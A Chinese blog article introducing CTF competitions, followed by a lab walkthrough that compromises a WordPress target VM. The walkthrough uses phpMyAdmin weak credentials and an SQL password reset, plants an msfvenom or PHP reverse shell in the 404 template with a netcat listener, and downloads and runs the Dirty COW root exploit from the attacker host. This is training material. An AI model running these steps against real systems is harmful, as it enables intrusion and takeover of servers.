2026/4/6 5:57:36
网站建设
项目流程
花都商城网站建设,在记算机上登陆一个网站点怎么做,网上购物平台大全,wordpress 数据库爆炸文章目录一#xff0c;CTF#xff08;CaptureThe Flag#xff09;1 CTF简介2 CTF赛事2.1 国家赛事2.2 国内赛事3 CTF意义4 CTF学习4.1 竞赛模式4.2 题目类型4.3 学习建议二#xff0c;CTF题目案例三#xff0c;CTF靶机实战一步步拿下WordPres1 实验环境1.1WordPress简介1.…文章目录一CTFCaptureThe Flag1 CTF简介2 CTF赛事2.1 国家赛事2.2 国内赛事3 CTF意义4 CTF学习4.1 竞赛模式4.2 题目类型4.3 学习建议二CTF题目案例三CTF靶机实战一步步拿下WordPres1 实验环境1.1WordPress简介1.2 实验拓扑图1.3 攻防机器2 实验过程第一步信息收集第二步漏洞挖掘第三步漏洞利用第四步权限提升3 思路总结渗透全过程红防御全过程蓝账号密码汇总渗透工具汇总一CTFCaptureThe Flag中国一般译作夺旗赛在网络安全领域中指的是网络网络安全技术人员之间进行攻防竞技的一种比赛形式。2019年国产电视剧《亲爱的热爱的》首次将CTF赛事搬进银幕通过李现扮演的“韩商言”让网络安全攻防技术正式进入大众视野。1 CTF简介CTFCapture The FlagCTF起源于1996年DEFCON全球黑客大会以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。2 CTF赛事2.1 国家赛事国际知名CTF赛事DEFCONCTF赛事中的“世界杯”。UCSB iCTF来自UCSB的面向世界高校的CTF。Plaid CTF包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛。Boston Key Party近年来崛起的在线解题赛。Codegate CTF韩国首尔“大奖赛”冠军奖金3000万韩元。Secuinside CTF韩国首尔“大奖赛”冠军奖金3000万韩元。XXC3 CTF欧洲历史最悠久CCC黑客大会举办的CTF。其中DEFCON CTF及具影响力认可度非常高。DEFCON极客大会是全球顶级的安全会议诞生于1993年被称为极客世界的“奥斯卡”。每年7月在美国的拉斯维加斯举行近万名参会者除来自世界各地的极客、安全领域研究者、爱好者还有全球许多大公司的代表以及美国国防部、联邦调查局、国家安全局等政府机构的官员。2.2 国内赛事XCTF联赛国内最权威、最高技术水平与最大影响力的CTF赛事品台。强网杯最权威的国家级安全比赛中央网信办网络安全协调局指导。红帽杯广东省公安厅广东省计算机网络安全协会举办。AliCTF阿里安全技术竞赛由阿里巴巴公司组织。TCTF腾讯信息安全争霸赛由腾讯安全联合实验室主办。BCTF百度全国网络安全技术对抗赛由百度安全主办。WCTF世黑客大师赛由360Vulcan团队组织。HCTF由杭州电子科技大学信息安全协会主办的CTF。ISCC全国大学生信息安全与对抗技术竞赛由北理工组织。CTF赛事 XCTF联赛XCTF联赛由清华大学蓝莲花战队发起组织网络空间安全人才基金和国家创新与发展战略研究会联合主办。XCTF联赛是国内最权威最高技术水平与最大影响力的网络安全CTF赛事平台。红帽杯红帽杯由广东省公安厅指导广东省计算机网络安全协会主办是面向党政机关、企事业单位、高等院校、安全企业对外的大型网络安全赛事。推进广东省“红帽先锋”人才培养计划锻炼网络安全技术人员的实战能力提高网络安全防护的应用水平促进广东省网络安全事业发展。3 CTF意义网络安全的学习非常需要实践来促进而真实环境不具备这样的条件CTF恰恰是一种锻炼和学习信息安全技术的训练场。CTF 近期在国内的发展非常迅猛认可度也非常高这证明了CTF存在的合理性和必要性。国家层面通过CTF比赛可以以赛代练培养出一批国内优秀的网络安全人才。企业层面通过CTF比赛可以更好练兵让相关信息安全部门的人员有效的提高安全意识持续学习安全技能。4 CTF学习4.1 竞赛模式解题模式Jeopardy线上赛在解题模式CTF赛制中参赛队伍可以通过互联网或者现场网络参与以解决网络安全技术挑战题目和分值和时间来排名通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用。Web渗透、密码、取证、隐写、安全编程等类别。攻防模式Attack-Defense在攻防模式CTF赛制中参赛队伍在网络空间互相进行攻击和防守挖掘网络服务漏洞并攻击对手服务得分修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况最终也以得分直接分出胜负是一种竞争激励具有很强观赏性和高度透明性的网络安全赛制。混合模式Mix结合了解题模式和攻防模式的CTF赛制比如参赛队伍通过解题可以获得一些初始分数然后通过攻防对抗进行得分增减的零和游戏最后以分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛。4.2 题目类型Reverse逆向工程题目涉及软件逆向、破解技术等要求有较强的反汇编、反编译功底。主要考查参赛选手的逆向分析能力。所需知识汇编语言、加密与解密、常见反编译工具。Pwn破解Pwn 在黑客俚语中代表着攻破获取权限在CTF比赛中代表着溢出类题目其中常见类型溢出漏洞有整数溢出、栈溢出等。主要考查参赛选手对而进制、漏洞挖掘和利用能力。所需知识C/C、ODIDA、数据结构、操作系统、汇编原理。WebWeb安全Web题目涉及到许多常见的Web漏洞如XSS、文件包含、代码执行、上传漏洞、SQL注入等。也有一些简单的关于网络基础知识的考察如返回包、tcp/ip、数据包内容和构造。主要考查选手Web站点漏洞挖掘和利用能力。所需知识PHP、Python、TCP/IP、SQL、OWASP TOP10。CryPto加解密题目考察各种加解密技术包括古典加密技术、现代加密技术甚至出题者自创加密技术以及一些常见的编码解码。主要考察参赛选手的密码学相关知识点。所需知识矩阵、数论、密码学。Misc杂项Misc即安全杂项题目涉及信息搜集、隐写术、流量分析、数字取证、编码转换等覆盖面比较广。主要考察选手的各种基础综合知识。所需知识常见的隐写术工具、Wireshark等流量审查工具、编码知识等。Mobile移动安全主要分为Android和iOS两个平台以Android逆向为主破解APK并提交正确答案。主要考察选手APP漏洞挖掘和利用能力。所需知识JavaAndroid开发。4.3 学习建议在掌握一定的基础知识前提下动手去做题。在能力范围的题目尽可能自己解出。能力范围外的题目参考writeup题解并亲手实践也非常有意义。怎么判断题目是否在能力范围内是否真的认真思考并尝试解题。writeup中是否涉及自己的短板知识。网站链接CTF Wiki https://ctf-wiki.github.io/ctf-wiki/CTF time https://ctftime.org/CTF Writeups https://github.com/ctfs/CTF 靶场 https://www.vulnhub.com/Docker漏洞靶场 https://vulhub.org/二CTF题目案例第三届红帽杯题目为例网络空间环境瞬息万变其复杂性和专业性对网络安全人才也提出了更高要求政府、企业、高校都在积极创新网络安全人才培养机制。作为改革开放的排头兵和先行地广东省互联网呈现网络基础好、规模大、发展快、生态完善、前景广阔的特征与此同时广东省亦是遭受网络攻击的重灾区。为此广东省分别以人才和技术为核心进行探索积极构筑全方位的网络安全防线。赛制全新升级网络靶场内上演实战演习本次决赛在往年“红帽杯”的基础上进行了赛制的全新升级大赛聚焦关键信息基础设施的典型漏洞及风险通过在平行仿真的网络靶场中将现实网络空间的威胁斗争映射成赛场上激烈的攻防博弈全面考核参赛队伍的漏洞发现、漏洞挖掘、漏洞修复、应急响应以及即时策略的综合能力在高仿真、全场景的网络靶场中全方位验证和提升选手实战能力。三CTF靶机实战一步步拿下WordPres1 实验环境1.1WordPress简介WordPress是利用PHP开发的博客平台用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统CMS来使用。WordPress是一款个人博客系统并逐步演化成一款内容管理系统软件它是使用PHP语言和MySQL数据库开发的用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。1.2 实验拓扑图1.3 攻防机器靶场下载Tips首次打开虚拟机时要选择“我已移动该虚拟机”选项渗透工具Kail Linux2 实验过程第一步信息收集主机发现主机发现也采用arp-scan、netdiscover、fping等工具。端口扫描使用nmap对发现的主机IP进行扫描命令nmap -sS -sV -p- -v -T4 靶机IP。参数说明-A详细扫描目标IP加载所有脚本尽可能全面的探测信息。-v显示详细的扫描过程。-sSTCP SYN扫描。-sV服务版本扫描。-p-扫描全部端口等同于-p 1-65535-T4级别越高速度越快最高为6级。威胁建模靶机开放端口及对应服务22 SSH服务80 HTTP服务3306 MySQL服务用Chrome浏览器访问靶机通过Wappalyzer插件获得信息CMSWordPress 5.0.4操作系统Centos后端语言PHP 5.3.3数据库MySQL第二步漏洞挖掘目录扫描目录扫描工具Dirb、DirBuster、Gobuster、御剑后台访问1.手工尝试尝试弱口令登录账号root密码root2.后台访问 - phpmyadmin爆破工具3.后台访问 - Burp爆破第三步漏洞利用修改管理员密码在wordpress数据库中找到wp_user表查询select * from wp_users密码经过加密我们直接更新密码为123456update wp_users set user_passmd5(123456) where user_logincleverbao;登录后台浏览器访问http://靶机ip/wp_admin输入账号密码进入后台修改数据库字段此靶机数据库部分字段例如wp的ip地址需要进行修改才能完成此实验。生成shell 方法1利用MSF生成反弹shellmsfvenom -p php/meterpreter/reverse_tcp LHOSTKail的IP LPORT4444 -o Desktop/shell.php生成shell 方法2利用Kail Linux自带的反弹shellrootkail:~# cat /usr/share/webshells/php/php-resverse-shell.php复制此shell代码到404模板修改IP为Kail地址端口为4444上传shell点击外观选择里面的编辑选择404模板在404模板插入反弹shell。获取shell使用netcat监听4444端口nc -nlvp 4444浏览器访问不存在的页面触发404文件执行例如http://靶机ip/?p666参数说明netcat命令解析-l监听-p监听本地端口-n指定IP地址-v熟悉详细信息-h帮助文档查看权限使用命令whoami查看当前权限。当前为apache权限还不是root权限需要进一步的体权。注$代表用户权限#代表root权限。第四步权限提升漏洞概述脏牛Dirty COW提权漏洞编号CVE-2016-5195漏洞名称脏牛Dirty COW漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权影响范围Linux内核2.6.222007年发行开始就受影响了直到2016年10月18日才修复。原理Linux内核的内存子系统在处理写入时复制copy-on-writeCOW时产生了竞争条件race condition。恶意用户可利用此漏洞来获取高权限对只读内存映射进行写访问。竞争条件指的是任务执行顺序异常可导致应用崩溃或令攻击者有机可乘甚是可能获得root权限。官方发出的一个exphttps://github.com/FireFart/dirtycow/blob/master/dirty.c代码执行下载到kail桌面并进入目录使用gcc编译gcc-pthread dirty.c -o dirty -lcrypt设置为执行权限chmod x dirty使用python开启http服务python -m SimpleHTTPSercer 80通过反弹的shell进入靶机/tmp目录使用wget下载dirty文件wget http://kail的IP地址/dirty。执行dirty完成提权获得登录信息./dirty new_password任意密码。3 思路总结渗透全过程红主机发现扫描和识别端口服务找到20、80、3306目录扫描找到敏感目录包括数据库和网站后台手工尝试登录数据库后台修改网站账号密码利用网站账号登录后台上传网站木马shell执行网站木马获取低权限shell判断系统版本寻找提权方法使用Dirty cow漏洞提权获取管理员账号实现root权限防御全过程蓝关闭不需要的端口遵循最小化原则使用常见网站CMS时修改默认后台路径使用PhpmyAdmin时修改默认路径和密码升级操作系统版本不定时打补丁漏洞关注最新漏洞情报提升安全运维响应能力账号密码汇总数据库后台账号密码root / root网站管理员账号密码cleverbao / 123456系统管理员账号密码firefart / 123456渗透工具汇总主机扫描nmap、arp-scan、netdiscover目录遍历dirb、dirbuster、gobuster、御剑漏洞挖掘与利用phpmyadmin、burp、msf、netcat权限提升dirty cow、gcc